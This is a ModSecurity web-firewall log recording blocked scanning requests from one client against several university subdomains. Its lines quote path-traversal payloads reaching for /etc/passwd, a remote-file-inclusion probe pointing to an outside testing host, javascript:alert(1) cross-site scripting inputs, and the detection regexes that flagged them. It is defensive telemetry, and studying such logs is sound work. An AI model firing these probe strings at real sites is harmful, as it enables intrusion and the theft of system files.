[Tue Aug 29 11:43:47.414477 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAc@cekAAAAL"]
[Tue Aug 29 11:43:47.415510 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAenGbcAAAAM"]
[Tue Aug 29 11:43:47.421667 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAeChfsAAAAw"]
[Tue Aug 29 11:43:47.427742 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAARpg-YAAAAU"]
[Tue Aug 29 11:43:48.350460 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAeChfwAAAAw"]
[Tue Aug 29 11:43:48.355656 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAcsLM4AAAAE"]
[Tue Aug 29 11:43:48.360001 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAfBL2EAAAAI"]
[Tue Aug 29 11:43:48.365042 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAdOeVsAAAAS"]
[Tue Aug 29 11:43:48.370954 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAdxUZMAAAAC"]
[Tue Aug 29 11:43:48.371970 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAenGbgAAAAM"]
[Tue Aug 29 11:43:48.411625 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAcsLNEAAAAE"]
[Tue Aug 29 11:43:48.415733 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAdb7tEAAAAb"]
[Tue Aug 29 11:43:48.431818 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13hMCo-f0AAAc4EsAAAAAP"]
[Tue Aug 29 11:43:48.451148 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAc4EsEAAAAP"]
[Tue Aug 29 11:43:48.468975 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAdOeWAAAAAS"]
[Tue Aug 29 11:43:49.416534 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAe8l4gAAAAF"]
[Tue Aug 29 11:43:49.417510 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAfBL2QAAAAI"]
[Tue Aug 29 11:43:49.419321 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hcCo-f0AAARpg-0AAAAU"]
[Tue Aug 29 11:43:49.439046 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAfBL2UAAAAI"]
[Tue Aug 29 11:43:49.439503 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAenGb0AAAAM"]
[Tue Aug 29 11:43:49.457126 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAeChgYAAAAw"]
[Tue Aug 29 11:43:49.479786 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hcCo-f0AAAeChgcAAAAw"]
[Tue Aug 29 11:43:50.400674 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hsCo-f0AAAdOeWYAAAAS"]
[Tue Aug 29 11:43:50.401118 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAdxUZ0AAAAC"]
[Tue Aug 29 11:43:50.408621 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAARphAMAAAAU"]
[Tue Aug 29 11:43:50.419917 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAc4EssAAAAP"]
[Tue Aug 29 11:43:50.420722 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAdb7tYAAAAb"]
[Tue Aug 29 11:43:50.424953 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAfBL2sAAAAI"]
[Tue Aug 29 11:43:50.428268 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAARphAQAAAAU"]
[Tue Aug 29 11:43:50.441345 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAdxUZ8AAAAC"]
[Tue Aug 29 11:43:50.456574 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAeChgwAAAAw"]
[Tue Aug 29 11:43:50.459199 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAdOeWgAAAAS"]
[Tue Aug 29 11:43:50.467691 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAdxUaAAAAAC"]
[Tue Aug 29 11:43:51.357691 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAfBL20AAAAI"]
[Tue Aug 29 11:43:51.363429 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAeX1JsAAAAK"]
[Tue Aug 29 11:43:51.363971 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAdb7tkAAAAb"]
[Tue Aug 29 11:43:51.364064 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAdxUaEAAAAC"]
[Tue Aug 29 11:43:51.393570 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAe8l5IAAAAF"]
[Tue Aug 29 11:43:51.401579 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13h8Co-f0AAAdOeWkAAAAS"]
[Tue Aug 29 11:43:51.425629 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13h8Co-f0AAAdb7tsAAAAb"]
